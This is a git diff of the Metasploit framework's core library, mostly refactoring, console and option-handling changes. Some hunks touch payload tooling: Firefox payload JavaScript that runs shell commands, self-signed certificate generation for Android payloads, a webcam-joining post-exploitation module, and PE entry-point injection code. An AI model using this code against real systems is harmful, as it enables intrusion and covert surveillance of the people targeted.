 
   #
   # Returns the address of the last target port (rough estimate)
   #
   def target_port
-    if(self.respond_to?('rport'))
-      return rport()
-    end
-
-    if(self.datastore['RPORT'])
-      return self.datastore['RPORT']
-    end
-
-    nil
+    self.respond_to?('rport') ? rport : self.datastore['RPORT']
   end
 
   #
@@ -516,7 +500,7 @@ class Module
   # Return a comma separated list of author for this module.
   #
   def author_to_s
-    return author.collect { |author| author.to_s }.join(", ")
+    author.collect { |author| author.to_s }.join(", ")
   end
 
   #
@@ -530,7 +514,7 @@ class Module
   # Return a comma separated list of supported architectures, if any.
   #
   def arch_to_s
-    return arch.join(", ")
+    arch.join(", ")
   end
 
   #
@@ -544,16 +528,18 @@ class Module
   # Return whether or not the module supports the supplied architecture.
   #
   def arch?(what)
-    return true if (what == ARCH_ANY)
-
-    return arch.index(what) != nil
+    if (what == ARCH_ANY)
+      true
+    else
+      arch.index(what) != nil
+    end
   end
 
   #
   # Return a comma separated list of supported platforms, if any.
   #
   def platform_to_s
-    return ((platform.all?) ? [ "All" ] : platform.names).join(", ")
+    platform.all? ? "All" : platform.names.join(", ")
   end
 
   #
@@ -567,7 +553,7 @@ class Module
   # Returns whether or not the module requires or grants high privileges.
   #
   def privileged?
-    return (privileged == true)
+    privileged == true
   end
 
   #
@@ -575,7 +561,7 @@ class Module
   # this somewhere else.
   #
   def comm
-    return Rex::Socket::Comm::Local
+    Rex::Socket::Comm::Local
   end
 
   #
@@ -749,7 +735,7 @@ class Module
   # Constants indicating the reason for an unsuccessful module attempt
   #
   module Failure
-    
+
     #
     # No confidence in success or failure
     #
@@ -814,7 +800,7 @@ class Module
     # The payload was delivered but no session was opened (AV, network, etc)
     #
     PayloadFailed   = 'payload-failed'
-  end	
+  end
 
 
   ##
@@ -827,42 +813,42 @@ class Module
   # Returns true if this module is an exploit module.
   #
   def exploit?
-    return (type == MODULE_EXPLOIT)
+    (type == MODULE_EXPLOIT)
   end
 
   #
   # Returns true if this module is a payload module.
   #
   def payload?
-    return (type == MODULE_PAYLOAD)
+    (type == MODULE_PAYLOAD)
   end
 
   #
   # Returns true if this module is an encoder module.
   #
   def encoder?
-    return (type == MODULE_ENCODER)
+    (type == MODULE_ENCODER)
   end
 
   #
   # Returns true if this module is a nop module.
   #
   def nop?
-    return (type == MODULE_NOP)
+    (type == MODULE_NOP)
   end
 
   #
   # Returns true if this module is an auxiliary module.
   #
   def auxiliary?
-    return (type == MODULE_AUX)
+    (type == MODULE_AUX)
   end
 
   #
   # Returns true if this module is an post-exploitation module.
   #
   def post?
-    return (type == MODULE_POST)
+    (type == MODULE_POST)
   end
 
   #
@@ -1073,7 +1059,7 @@ protected
       merge_check_key(info, name, val)
     }
 
-    return info
+    info
   end
 
   #
@@ -1153,7 +1139,7 @@ protected
   # Merges the module description.
   #
   def merge_info_description(info, val)
-    merge_info_string(info, 'Description', val)
+    merge_info_string(info, 'Description', val, ". ", true)
   end
 
   #
diff --git a/lib/msf/core/module/deprecated.rb b/lib/msf/core/module/deprecated.rb
index 2dee7bfddd..dea8f15d52 100644
--- a/lib/msf/core/module/deprecated.rb
+++ b/lib/msf/core/module/deprecated.rb
@@ -33,18 +33,34 @@ module Msf::Module::Deprecated
   end
 
   # (see ClassMethods#replacement_module)
-  def replacement_module; self.class.replacement_module; end
+  def replacement_module
+    if self.class.instance_variable_defined?(:@replacement_module)
+      return self.class.replacement_module
+    elsif self.class.const_defined?(:DEPRECATION_REPLACEMENT)
+      return self.class.const_get(:DEPRECATION_REPLACEMENT)
+    end
+  end
+
   # (see ClassMethods#deprecation_date)
-  def deprecation_date; self.class.deprecation_date; end
+  def deprecation_date
+    if self.class.instance_variable_defined?(:@deprecation_date)
+      return self.class.deprecation_date
+    elsif self.class.const_defined?(:DEPRECATION_DATE)
+      return self.class.const_get(:DEPRECATION_DATE)
+    end
+  end
 
   # Extends with {ClassMethods}
   def self.included(base)
     base.extend(ClassMethods)
   end
 
-  def setup
+  # Print the module deprecation information
+  #
+  # @return [void]
+  def print_deprecation_warning
     print_warning("*"*72)
-    print_warning("*%red"+"This module is deprecated!".center(70)+"%clr*")
+    print_warning("*%red"+"The module #{refname} is deprecated!".center(70)+"%clr*")
     if deprecation_date
       print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*")
     end
@@ -52,6 +68,21 @@ module Msf::Module::Deprecated
       print_warning("*"+"Use #{replacement_module} instead".center(70)+"*")
     end
     print_warning("*"*72)
+  end
+
+  def init_ui(input = nil, output = nil)
+    super(input, output)
+    print_deprecation_warning
+    @you_have_been_warned = true
+  end
+
+  def generate
+    print_deprecation_warning
+    super
+  end
+
+  def setup
+    print_deprecation_warning unless @you_have_been_warned
     super
   end
 
diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb
index aed29b7be2..a5712125ce 100644
--- a/lib/msf/core/modules/loader/directory.rb
+++ b/lib/msf/core/modules/loader/directory.rb
@@ -109,4 +109,4 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
 
     module_content
   end
-end
\ No newline at end of file
+end
diff --git a/lib/msf/core/option_container.rb b/lib/msf/core/option_container.rb
index d3b7901ca5..9283f1e3e3 100644
--- a/lib/msf/core/option_container.rb
+++ b/lib/msf/core/option_container.rb
@@ -20,6 +20,7 @@ class OptBase
   # attrs[1] = description (string)
   # attrs[2] = default value
   # attrs[3] = possible enum values
+  # attrs[4] = Regex to validate the option
   #
   def initialize(in_name, attrs = [])
     self.name     = in_name
@@ -29,6 +30,21 @@ class OptBase
     self.desc     = attrs[1]
     self.default  = attrs[2]
     self.enums    = [ *(attrs[3]) ].map { |x| x.to_s }
+    regex_temp    = attrs[4] || nil
+    if regex_temp
+      # convert to string
+      regex_temp = regex_temp.to_s if regex_temp.is_a? Regexp
+      # remove start and end character, they will be added later
+      regex_temp = regex_temp.sub(/^\^/, '').sub(/\$$/, '')
+      # Add start and end marker to match the whole regex
+      regex_temp = "^#{regex_temp}$"
+      begin
+        Regexp.compile(regex_temp)
+        self.regex = regex_temp
+      rescue RegexpError, TypeError => e
+        raise("Invalid Regex #{regex_temp}: #{e}")
+      end
+    end
   end
 
   #
@@ -63,7 +79,18 @@ class OptBase
   # If it's required and the value is nil or empty, then it's not valid.
   #
   def valid?(value)
-    return (required? and (value == nil or value.to_s.empty?)) ? false : true
+    if required?
+      # required variable not set
+      return false if (value == nil or value.to_s.empty?)
+    end
+    if regex
+      if value.match(regex)
+        return true
+      else
+        return false
+      end
+    end
+    return true
   end
 
   #
@@ -125,6 +152,10 @@ class OptBase
   # The list of potential valid values
   #
   attr_accessor :enums
+  #
+  # A optional regex to validate the option value
+  #
+  attr_accessor :regex
 
 protected
 
diff --git a/lib/msf/core/payload/dalvik.rb b/lib/msf/core/payload/dalvik.rb
index aeae5aa361..66c0345f2b 100644
--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -31,5 +31,36 @@ module Msf::Payload::Dalvik
     [str.length].pack("N") + str
   end
 
+  def string_sub(data, placeholder="", input="")
+    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
+  end
+
+  def generate_cert
+    x509_name = OpenSSL::X509::Name.parse(
+      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
+      )
+    key  = OpenSSL::PKey::RSA.new(1024)
+    cert = OpenSSL::X509::Certificate.new
+    cert.version = 2
+    cert.serial = 1
+    cert.subject = x509_name
+    cert.issuer = x509_name
+    cert.public_key = key.public_key
+
+    # Some time within the last 3 years
+    cert.not_before = Time.now - rand(3600*24*365*3)
+
+    # From http://developer.android.com/tools/publishing/app-signing.html
+    # """
+    # A validity period of more than 25 years is recommended.
+    #
+    # If you plan to publish your application(s) on Google Play, note
+    # that a validity period ending after 22 October 2033 is a
+    # requirement. You can not upload an application if it is signed
+    # with a key whose validity expires before that date.
+    # """
+    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
+    return cert, key
+  end
 end
 
diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index db762a3f54..a958c6f5af 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -16,6 +16,37 @@ module Msf::Payload::Firefox
     |
   end
 
+  # Javascript source of readUntilToken(s)
+  # Continues reading the stream as data is available, until a pair of
+  #   command tokens like [[aBcD123ffh]] [[aBcD123ffh]] is consumed.
+  #
+  # Returns a function that can be passed to the #onDataAvailable callback of
+  #   nsIInputStreamPump that will buffer until a second token is read, or, in
+  #   the absence of any tokens, a newline character is read.
+  #
+  # @return [String] javascript source code that exposes the readUntilToken(cb) function
+  def read_until_token_source
+    %Q|
+      var readUntilToken = function(cb) {
+        Components.utils.import("resource://gre/modules/NetUtil.jsm");
+
+        var buffer = '', m = null;
+        return function(request, context, stream, offset, count) {
+          buffer += NetUtil.readInputStreamToString(stream, count);
+          if (buffer.match(/^(\\[\\[\\w{8}\\]\\])/)) {
+            if (m = buffer.match(/^(\\[\\[\\w{8}\\]\\])([\\s\\S]*)\\1/)) {
+              cb(m[2]);
+              buffer = '';
+            }
+          } else if (buffer.indexOf("\\n") > -1) {
+            cb(buffer);
+            buffer = '';
+          }
+        };
+      };
+    |
+  end
+
   # Javascript source code of readFile(path) - synchronously reads a file and returns
   # its contents. The file is deleted immediately afterwards.
   #
@@ -92,7 +123,7 @@ module Msf::Payload::Firefox
           try {
             retVal = Function('send', js[1])(function(r){
               if (sent) return;
-              sent = true
+              sent = true;
               if (r) {
                 if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
                 else      cb(false, r+tag+"\\n");
@@ -111,7 +142,7 @@ module Msf::Payload::Firefox
         }
 
         var shEsc = "\\\\$&";
-        var shPath = "/bin/sh -c"
+        var shPath = "/bin/sh -c";
 
         if (windows) {
           shPath = "cmd /c";
@@ -189,4 +220,5 @@ module Msf::Payload::Firefox
       (new ActiveXObject("WScript.Shell")).Run(cmd, 0, true);
     |
   end
+
 end
diff --git a/lib/msf/core/post.rb b/lib/msf/core/post.rb
index d9574910be..0e37cfb6dd 100644
--- a/lib/msf/core/post.rb
+++ b/lib/msf/core/post.rb
@@ -9,6 +9,7 @@ class Msf::Post < Msf::Module
   require 'msf/core/post_mixin'
 
   require 'msf/core/post/file'
+  require 'msf/core/post/webrtc'
 
   require 'msf/core/post/linux'
   require 'msf/core/post/osx'
diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb
index ed4fe536f6..96c72ec0e2 100644
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -110,6 +110,7 @@ module Msf::Post::Common
         break if d == ""
         o << d
       end
+      o.chomp! if o
       process.channel.close
       process.close
     when /shell/
diff --git a/lib/msf/core/post/webrtc.rb b/lib/msf/core/post/webrtc.rb
new file mode 100644
index 0000000000..0f89b4bd4a
--- /dev/null
+++ b/lib/msf/core/post/webrtc.rb
@@ -0,0 +1,57 @@
+# -*- coding: binary -*-
+
+module Msf::Post::WebRTC
+
+  #
+  # Connects to a video chat session as an answerer
+  #
+  # @param offerer_id [String] The offerer's ID in order to join the video chat
+  # @return void
+  #
+  def connect_video_chat(server, channel, offerer_id)
+    interface = load_interface('answerer.html')
+    interface.gsub!(/\=SERVER\=/, server)
+    interface.gsub!(/\=RHOST\=/, rhost)
+    interface.gsub!(/\=CHANNEL\=/, channel)
+    interface.gsub!(/\=OFFERERID\=/, offerer_id)
+
+    tmp_interface = Tempfile.new(['answerer', '.html'])
+    tmp_interface.binmode
+    tmp_interface.write(interface)
+    tmp_interface.close
+
+    found_local_browser = Rex::Compat.open_webrtc_browser(tmp_interface.path)
+    unless found_local_browser
+      raise RuntimeError, "Unable to find a suitable browser to connect to the target"
+    end
+  end
+
+
+  #
+  # Returns the webcam interface
+  #
+  # @param html_name [String] The filename of the HTML interface (offerer.html or answerer.html)
+  # @return [String] The HTML interface code
+  #
+  def load_interface(html_name)
+    interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name)
+    interface_code = ''
+    ::File.open(interface_path) { |f| interface_code = f.read }
+    interface_code.gsub!(/\=WEBRTCAPIJS\=/, load_api_code)
+    interface_code
+  end
+
+
+  #
+  # Returns the webcam API
+  #
+  # @return [String] The WebRTC lib code
+  #
+  def load_api_code
+    js_api_path = ::File.join(Msf::Config.data_directory, 'webcam', 'api.js')
+    api = ''
+    ::File.open(js_api_path) { |f| api = f.read }
+    api
+  end
+
+end
diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb
index 33b6fca9f8..b77da4a5e3 100644
--- a/lib/msf/core/post/windows/powershell.rb
+++ b/lib/msf/core/post/windows/powershell.rb
@@ -19,8 +19,8 @@ module Powershell
   # Returns true if powershell is installed
   #
   def have_powershell?
-    cmd_out = cmd_exec("powershell get-host")
-    return true if cmd_out =~ /Name.*Version.*InstanceID/
+    cmd_out = cmd_exec('cmd.exe /c "echo. | powershell get-host"')
+    return true if cmd_out =~ /Name.*Version.*InstanceId/m
     return false
   end
 
diff --git a/lib/msf/core/post/windows/process.rb b/lib/msf/core/post/windows/process.rb
index 2509e9de44..53a4e1e3f3 100644
--- a/lib/msf/core/post/windows/process.rb
+++ b/lib/msf/core/post/windows/process.rb
@@ -35,10 +35,10 @@ module Process
     thread = host.thread.create(shell_addr,0)
     unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
       vprint_error("Unable to create thread")
-      return false
+      nil
     end
 
-    true
+    thread
   end
 
 end # Process
diff --git a/lib/msf/http/wordpress/login.rb b/lib/msf/http/wordpress/login.rb
index c0219163bb..27ccff4f64 100644
--- a/lib/msf/http/wordpress/login.rb
+++ b/lib/msf/http/wordpress/login.rb
@@ -15,22 +15,13 @@ module Msf::HTTP::Wordpress::Login
     })
 
     if res and (res.code == 301 or res.code == 302) and res.headers['Location'] == redirect
-      match = res.get_cookies.match(/(wordpress(?:_sec)?_logged_in_[^=]+=[^;]+);/i)
-      # return wordpress login cookie
-      return match[0] if match
-
-      # support for older wordpress versions
-      # Wordpress 2.0
-      match_user = res.get_cookies.match(/(wordpressuser_[^=]+=[^;]+);/i)
-      match_pass = res.get_cookies.match(/(wordpresspass_[^=]+=[^;]+);/i)
-      # return wordpress login cookie
-      return "#{match_user[0]} #{match_pass[0]}" if (match_user and match_pass)
-
-      # Wordpress 2.5
-      match_2_5 = res.get_cookies.match(/(wordpress_[a-z0-9]+=[^;]+);/i)
-      # return wordpress login cookie
-      return match_2_5[0] if match_2_5
+      cookies = res.get_cookies
+      # Check if a valid wordpress cookie is returned
+      return cookies if cookies =~ /wordpress(?:_sec)?_logged_in_[^=]+=[^;]+;/i ||
+        cookies =~ /wordpress(?:user|pass)_[^=]+=[^;]+;/i ||
+        cookies =~ /wordpress_[a-z0-9]+=[^;]+;/i
     end
+
     return nil
   end
 
diff --git a/lib/msf/http/wordpress/uris.rb b/lib/msf/http/wordpress/uris.rb
index 19fd567fc4..659b419572 100644
--- a/lib/msf/http/wordpress/uris.rb
+++ b/lib/msf/http/wordpress/uris.rb
@@ -66,4 +66,18 @@ module Msf::HTTP::Wordpress::URIs
     normalize_uri(target_uri.path, 'wp-links-opml.php')
   end
 
+  # Returns the Wordpress Backend URL
+  #
+  # @return [String] Wordpress Backend URL
+  def wordpress_url_backend
+    normalize_uri(target_uri.path, 'wp-admin/')
+  end
+
+  # Returns the Wordpress Admin Ajax URL
+  #
+  # @return [String] Wordpress Admin Ajax URL
+  def wordpress_url_admin_ajax
+    normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
+  end
+
 end
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index fcd294fa6c..c3123ace14 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -97,6 +97,9 @@ class Core
   # mode.
   DefangedProhibitedDataStoreElements = [ "MsfModulePaths" ]
 
+  # Constant for disclosure date formatting in search functions
+  DISCLOSURE_DATE_FORMAT = "%Y-%m-%d"
+
   # Returns the list of commands supported by this command dispatcher
   def commands
     {
@@ -344,7 +347,7 @@ class Core
       # Restore the prompt
       prompt = framework.datastore['Prompt'] || Msf::Ui::Console::Driver::DefaultPrompt
       prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar
-      driver.update_prompt("#{prompt}", prompt_char, true)
+      driver.update_prompt("#{prompt} ", prompt_char, true)
     end
   end
 
@@ -384,40 +387,42 @@ class Core
   def cmd_banner(*args)
     banner  = "%cya" + Banner.to_s + "%clr\n\n"
 
-    if is_apt
+    # These messages should /not/ show up when you're on a git checkout;
+    # you're a developer, so you already know all this.
+    if (is_apt || binary_install)
       content = [
-        "Large pentest? List, sort, group, tag and search your hosts and services\nin Metasploit Pro -- type 'go_pro' to launch it now.",
-        "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- type 'go_pro' to launch it now.",
-        "Save your shells from AV! Upgrade to advanced AV evasion using dynamic\nexe templates with Metasploit Pro -- type 'go_pro' to launch it now.",
-        "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro's wizard -- type 'go_pro' to launch it now.",
-        "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type 'go_pro' to launch it now.",
-        "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\n-- type 'go_pro' to launch it now."
+        "Trouble managing data? List, sort, group, tag and search your pentest data\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit",
+        "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- learn more on http://rapid7.com/metasploit",
+        "Payload caught by AV? Fly under the radar with Dynamic Payloads in\nMetasploit Pro -- learn more on http://rapid7.com/metasploit",
+        "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit",
+        "Taking notes in notepad? Have Metasploit Pro track & report\nyour progress and findings -- learn more on http://rapid7.com/metasploit",
+        "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\nLearn more on http://rapid7.com/metasploit",
+        "Love leveraging credentials? Check out bruteforcing\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit",
+        "Save 45% of your time on large engagements with Metasploit Pro\nLearn more on http://rapid7.com/metasploit",
+        "Validate lots of vulnerabilities to demonstrate exposure\nwith Metasploit Pro -- Learn more on http://rapid7.com/metasploit"
       ]
       banner << content.sample # Ruby 1.9-ism!
       banner << "\n\n"
     end
 
-    banner << "       =[ %yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr ]\n"
-    banner << "+ -- --=[ "
-    banner << "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post ]\n"
-    banner << "+ -- --=[ "
-
-    oldwarn = nil
     avdwarn = nil
 
-    banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops      ]\n"
-    if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate)
-      tstamp = ::Msf::Framework::RepoUpdatedDate.strftime("%Y.%m.%d")
-      banner << "       =[ svn r#{::Msf::Framework::RepoRevision} updated #{::Msf::Framework::RepoUpdatedDaysNote} (#{tstamp})\n"
-      if(::Msf::Framework::RepoUpdatedDays > 7)
-        oldwarn = []
-        oldwarn << "Warning: This copy of the Metasploit Framework was last updated #{::Msf::Framework::RepoUpdatedDaysNote}."
-        oldwarn << "         We recommend that you update the framework at least every other day."
-        oldwarn << "         For information on updating your copy of Metasploit, please see:"
-        oldwarn << "             https://community.rapid7.com/docs/DOC-1306"
-        oldwarn << ""
-      end
-    end
+    banner_trailers = {
+      :version     => "%yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr",
+      :exp_aux_pos => "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post",
+      :pay_enc_nop => "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops",
+      :free_trial  => "Free Metasploit Pro trial: http://r-7.co/trymsp",
+      :padding     => 48
+    }
+
+    banner << ("       =[ %-#{banner_trailers[:padding]+8}s]\n" % banner_trailers[:version])
+    banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:exp_aux_pos])
+    banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:pay_enc_nop])
+
+    # TODO: People who are already on a Pro install shouldn't see this.
+    # It's hard for Framework to tell the difference though since
+    # license details are only in Pro -- we can't see them from here.
+    banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:free_trial])
 
     if ::Msf::Framework::EICARCorrupted
       avdwarn = []
@@ -428,22 +433,9 @@ class Core
       avdwarn << ""
     end
 
-    # We're running a two week survey to gather feedback from users.
-    # Let's make sure we reach regular msfconsole users.
-    # TODO: Get rid of this sometime after 2014-01-23
-    survey_expires = Time.new(2014,"Jan",22,23,59,59,"-05:00")
-    if Time.now.to_i < survey_expires.to_i
-      banner << "+ -- --=[ Answer Q's about Metasploit and win a WiFi Pineapple Mk5   ]\n"
-      banner << "+ -- --=[ http://bit.ly/msfsurvey (Expires #{survey_expires.ctime}) ]\n"
-    end
-
     # Display the banner
     print_line(banner)
 
-    if(oldwarn)
-      oldwarn.map{|line| print_line(line) }
-    end
-
     if(avdwarn)
       avdwarn.map{|line| print_error(line) }
     end
@@ -1488,7 +1480,7 @@ class Core
         next if not o
 
         if not o.search_filter(match)
-          tbl << [ o.fullname, o.disclosure_date.to_s, o.rank_to_s, o.name ]
+          tbl << [ o.fullname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), o.rank_to_s, o.name ]
         end
       end
     end
@@ -1503,7 +1495,7 @@ class Core
   def search_modules_sql(search_string)
     tbl = generate_module_table("Matching Modules")
     framework.db.search_modules(search_string).each do |o|
-      tbl << [ o.fullname, o.disclosure_date.to_s, RankingName[o.rank].to_s, o.name ]
+      tbl << [ o.fullname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), RankingName[o.rank].to_s, o.name ]
     end
     print_line(tbl.to_s)
   end
@@ -2033,6 +2025,19 @@ class Core
       end
     end
 
+    unless str.blank?
+      res = res.select { |term| term.upcase.start_with?(str.upcase) }
+      res = res.map { |term|
+        if str == str.upcase
+          str + term[str.length..-1].upcase
+        elsif str == str.downcase
+          str + term[str.length..-1].downcase
+        else
+          str + term[str.length..-1]
+        end
+      }
+    end
+
     return res
   end
 
@@ -2620,7 +2625,7 @@ class Core
     if mod # if there is an active module, give them the fanciness they have come to expect
       driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true)
     else
-      driver.update_prompt("#{prompt}", prompt_char, true)
+      driver.update_prompt("#{prompt} ", prompt_char, true)
     end
 
     # dump the command's output so we can grep it
@@ -2730,6 +2735,8 @@ class Core
     # Is this option used by the active module?
     if (mod.options.include?(opt))
       res.concat(option_values_dispatch(mod.options[opt], str, words))
+    elsif (mod.options.include?(opt.upcase))
+      res.concat(option_values_dispatch(mod.options[opt.upcase], str, words))
     end
 
     # How about the selected payload?
@@ -2737,6 +2744,8 @@ class Core
       p = framework.payloads.create(mod.datastore['PAYLOAD'])
       if (p and p.options.include?(opt))
         res.concat(option_values_dispatch(p.options[opt], str, words))
+      elsif (p and p.options.include?(opt.upcase))
+        res.concat(option_values_dispatch(p.options[opt.upcase], str, words))
       end
     end
 
@@ -2770,8 +2779,10 @@ class Core
         end
 
       when 'Msf::OptAddressRange'
-
         case str
+          when /^file:(.*)/
+            files = tab_complete_filenames($1, words)
+            res += files.map { |f| "file:" + f } if files
           when /\/$/
             res << str+'32'
             res << str+'24'
@@ -2802,9 +2813,20 @@ class Core
         o.enums.each do |val|
           res << val
         end
+
       when 'Msf::OptPath'
-        files = tab_complete_filenames(str,words)
+        files = tab_complete_filenames(str, words)
         res += files if files
+
+      when 'Msf::OptBool'
+        res << 'true'
+        res << 'false'
+
+      when 'Msf::OptString'
+        if (str =~ /^file:(.*)/)
+          files = tab_complete_filenames($1, words)
+          res += files.map { |f| "file:" + f } if files
+        end
     end
 
     return res
@@ -3040,6 +3062,18 @@ class Core
     File.exists?(File.expand_path(File.join(msfbase_dir, '.apt')))
   end
 
+  # Determines if we're a Metasploit Pro/Community/Express
+  # installation or a tarball/git checkout
+  #
+  # @return [Boolean] true if we are a binary install
+  def binary_install
+    binary_paths = [
+      'C:/metasploit/apps/pro/msf3',
+      '/opt/metasploit/apps/pro/msf3'
+    ]
+    return binary_paths.include? Msf::Config.install_root
+  end
+
   #
   # Module list enumeration
   #
@@ -3239,7 +3273,7 @@ class Core
             end
           end
           if (opts == nil or show == true)
-            tbl << [ refname, o.disclosure_date||"", o.rank_to_s, o.name ]
+            tbl << [ refname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), o.rank_to_s, o.name ]
           end
         end
       end
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index f779e4de63..e16c68ac1a 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -1304,25 +1304,38 @@ class Db
     print_line
     print_line "Filenames can be globs like *.xml, or **/*.xml which will search recursively"
     print_line "Currently supported file types include:"
-    print_line "    Acunetix XML"
+    print_line "    Acunetix"
     print_line "    Amap Log"
     print_line "    Amap Log -m"
-    print_line "    Appscan XML"
+    print_line "    Appscan"
     print_line "    Burp Session XML"
-    print_line "    Foundstone XML"
+    print_line "    CI"
+    print_line "    Foundstone"
+    print_line "    FusionVM XML"
+    print_line "    IP Address List"
     print_line "    IP360 ASPL"
     print_line "    IP360 XML v3"
+    print_line "    Libpcap Packet Capture"
+    print_line "    Metasploit PWDump Export"
+    print_line "    Metasploit XML"
+    print_line "    Metasploit Zip Export"
     print_line "    Microsoft Baseline Security Analyzer"
-    print_line "    Nessus NBE"
-    print_line "    Nessus XML (v1 and v2)"
-    print_line "    NetSparker XML"
     print_line "    NeXpose Simple XML"
     print_line "    NeXpose XML Report"
+    print_line "    Nessus NBE Report"
+    print_line "    Nessus XML (v1)"
+    print_line "    Nessus XML (v2)"
+    print_line "    NetSparker XML"
+    print_line "    Nikto XML"
     print_line "    Nmap XML"
     print_line "    OpenVAS Report"
+    print_line "    OpenVAS XML"
+    print_line "    Outpost24 XML"
     print_line "    Qualys Asset XML"
     print_line "    Qualys Scan XML"
     print_line "    Retina XML"
+    print_line "    Spiceworks CSV Export"
+    print_line "    Wapiti XML"
     print_line
   end
 
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 9e41ee0430..e00e9cc788 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -299,7 +299,6 @@ require 'msf/core/exe/segment_injector'
   end
 
   def self.to_winpe_only(framework, code, opts={}, arch="x86")
-
     if arch == ARCH_X86_64
       arch = ARCH_X64
     end
@@ -310,30 +309,60 @@ require 'msf/core/exe/segment_injector'
     pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
 
     exe = ''
-      File.open(opts[:template], 'rb') { |fd|
-        exe = fd.read(fd.stat.size)
-      }
+    File.open(opts[:template], 'rb') { |fd|
+      exe = fd.read(fd.stat.size)
+    }
+
+    pe_header_size = 0x18
+    entryPoint_offset = 0x28
+    section_size = 0x28
+    characteristics_offset = 0x24
+    virtualAddress_offset = 0x0c
+    sizeOfRawData_offset = 0x10
+
+    sections_table_offset =
+      pe._dos_header.v['e_lfanew'] +
+      pe._file_header.v['SizeOfOptionalHeader'] +
+      pe_header_size
+
+    sections_table_characteristics_offset = sections_table_offset + characteristics_offset
 
     sections_header = []
-    pe._file_header.v['NumberOfSections'].times { |i| sections_header << [(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18+0x24),exe[(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18),0x28]] }
+    pe._file_header.v['NumberOfSections'].times { |i|
+      section_offset = sections_table_offset + (i * section_size)
+      sections_header << [
+        sections_table_characteristics_offset + (i * section_size),
+        exe[section_offset,section_size]
+      ]
+    }
 
+    addressOfEntryPoint = pe.hdr.opt.AddressOfEntryPoint
 
-    #look for section with entry point
+    # look for section with entry point
     sections_header.each do |sec|
-      virtualAddress = sec[1][0xc,0x4].unpack('L')[0]
-      sizeOfRawData = sec[1][0x10,0x4].unpack('L')[0]
-      characteristics = sec[1][0x24,0x4].unpack('L')[0]
-      if pe.hdr.opt.AddressOfEntryPoint >= virtualAddress && pe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
-        #put this section writable
-        characteristics|=0x80000000
+      virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0]
+      sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0]
+      characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
+
+      if (virtualAddress...virtualAddress+sizeOfRawData).include?(addressOfEntryPoint)
+        importsTable = pe.hdr.opt.DataDirectory[8..(8+4)].unpack('L')[0]
+        if (importsTable - addressOfEntryPoint) < code.length
